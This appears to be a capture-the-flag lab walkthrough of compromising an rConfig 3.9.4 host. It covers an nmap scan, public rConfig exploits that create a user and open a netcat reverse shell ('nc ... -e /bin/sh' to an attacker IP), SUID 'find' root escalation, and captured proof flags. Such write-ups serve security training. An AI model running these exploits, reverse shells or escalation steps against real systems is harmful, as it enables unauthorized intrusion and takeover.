Enumeration
Network Scan with Nmap
PORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http111/tcp open rpcbind139/tcp open netbios-ssn445/tcp open microsoft-ds3306/tcp open mysql8081/tcp open blackice-icecap
PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.2| ftp-syst:| STAT:| FTP server status:| Connected to ::ffff:192.168.49.194| Logged in as ftp| TYPE: ASCII| No session bandwidth limit| Session timeout in seconds is 300| Control connection is plain text| Data connections will be plain text| At session startup, client count was 2| vsFTPd 3.0.2 - secure, fast, stable|_End of status| ftp-anon: Anonymous FTP login allowed (FTP code 230)|_Can't get directory listing: TIMEOUT22/tcp open ssh OpenSSH 7.4 (protocol 2.0)| ssh-hostkey:| 2048 a2:ec:75:8d:86:9b:a3:0b:d3:b6:2f:64:04:f9:fd:25 (RSA)| 256 b6:d2:fd:bb:08:9a:35:02:7b:33:e3:72:5d:dc:64:82 (ECDSA)|_ 256 08:95:d6:60:52:17:3d:03:e4:7d:90:fd:b2:ed:44:86 (ED25519)80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16| http-methods:|_ Potentially risky methods: TRACE|_http-title: Apache HTTP Server Test Page powered by CentOS111/tcp open rpcbind 2-4 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2,3,4 111/tcp rpcbind| 100000 2,3,4 111/udp rpcbind| 100000 3,4 111/tcp6 rpcbind|_ 100000 3,4 111/udp6 rpcbind139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)445/tcp open netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)3306/tcp open mysql MariaDB (unauthorized)8081/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16|_http-title: 400 Bad RequestExploitation
Initial Access
search for known exploit of rconfig
$ searchsploit rconfigrConfig 3.9.5 - Remote Code Execution (Unauthenticated)| php/webapps/48878.pyrConfig 3.9.4 - 'search.crud.php' Remote Command Injection| php/webapps/48241.pyrConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution| php/webapps/48261.pyrConfig 3.9.4 | Remote Code Execution
Create user with 48878.py exploit
Note! Play with payload. It may be possible to get shell from this exploit alone
$ python3 48878.pyConnecting to: https://192.168.194.57:8081/Connect back is set to: nc 192.168.49.194 3306 -e /bin/sh, please launch 'nc -lv 9001'Version is rConfig Version 3.9.4 it may not be vulnerableRemote Code Execution + Auth bypass rConfig 3.9.5 by Daniel MonzónIn the last stage if your payload is a reverse shell, the exploit may not launch the success message, but check your netcat ;)Note: preferred method for auth bypass is 1, because it is less 'invasive'Note2: preferred method for RCE is 2, as it does not need you to know if, for example, netcat has been installed in the target machineChoose method for authentication bypass: 1) User creation 2) User enumeration + User editMethod>1(+) User test createdUse 48241.py to get the shell using the creds above exploit created
$ python3 48241.py https://192.168.194.57:8081 test Testing1@ 192.168.49.194 8081
$ nc -nvlp 8081listening on [any] 8081 ...connect to [192.168.49.194] from (UNKNOWN) [192.168.194.57] 49986sh-4.2$Privilege Escalation
SUID misconfiguration
bash-4.2$ find / -type f -perm /4000 2>/dev/null/usr/bin/find/usr/bin/chage/usr/bin/gpasswd/usr/bin/chfn/usr/bin/chsh/usr/bin/newgrp/usr/bin/su/usr/bin/sudo/usr/bin/mount/usr/bin/umount/usr/bin/crontab/usr/bin/pkexec/usr/bin/passwd/usr/bin/fusermount/usr/sbin/unix_chkpwd/usr/sbin/pam_timestamp_check/usr/sbin/usernetctl/usr/lib/polkit-1/polkit-agent-helper-1/usr/libexec/dbus-1/dbus-daemon-launch-helperbash-4.2$ find . -exec /bin/bash -p \; -quitbash-4.2# cd /rootbash-4.2# cat proof.txt873329b70d9edf1b88c3434906594602bash-4.2# cat /home/rconfig/lolocal.txt logs/bash-4.2# cat /home/rconfig/local.txt0a805fb0a86e65de55c9fc587b9b69f6